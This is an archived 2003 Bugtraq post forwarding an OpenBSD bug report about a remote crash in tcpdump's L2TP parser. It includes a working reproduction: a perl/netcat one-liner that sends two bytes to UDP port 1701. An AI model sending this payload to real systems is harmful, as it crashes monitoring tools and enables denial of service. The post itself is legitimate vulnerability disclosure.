lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <3FE477F2.6050008@freebsd.lublin.pl>
Date: Sat, 20 Dec 2003 17:25:22 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Remote crash in tcpdump from OpenBSD


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



- -------- Original Message --------
Subject: user/3610: repetable tcpdump remote crash
Resent-Date: Sat, 20 Dec 2003 08:55:02 -0700 (MST)
Resent-From: gnats@....openbsd.org (GNATS Filer)
Resent-To: bugs@....openbsd.org
Date: Sat, 20 Dec 2003 16:42:25 +0100 (CET)
From: venglin@...ebsd.lublin.pl
Reply-To: venglin@...ebsd.lublin.pl
To: gnats@...nbsd.org

>Number:         3610
>Category:       user
>Synopsis:       repetable tcpdump remote crash
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Sat Dec 20 15:50:02 GMT 2003
>Closed-Date:
>Last-Modified:
>Originator:     Przemyslaw Frasunek
>Release:        3.3-RELEASE
>Organization:
net
>Environment:
	System      : OpenBSD 3.3
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:
	Sending a packet containg 0xff,0x02 bytes to port 1701/udp causes
	a L2TP protocol parser in tcpdump to enter an infinite loop, eating
	all available memory and then segfaulting.

	This bug also affects tcpdump in -CURRENT.
>How-To-Repeat:
	tcpdump -i lo0 -n udp and dst port 1701 &
	perl -e 'print "\xff\x02"' | nc -u localhost 1701
>Fix:
	Unknown, recent versions of tcpdump are immune to this problem.


>Release-Note:
>Audit-Trail:
>Unformatted:


- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@...ber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE/5HfykxEnBiV4/K0RApAkAKDMw3qheVAkGu3v2EvoCoq07C8ZYgCgh9sl
ZjwiNzK9di8oSMQ1XK/YF+g=
=Q0AT
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ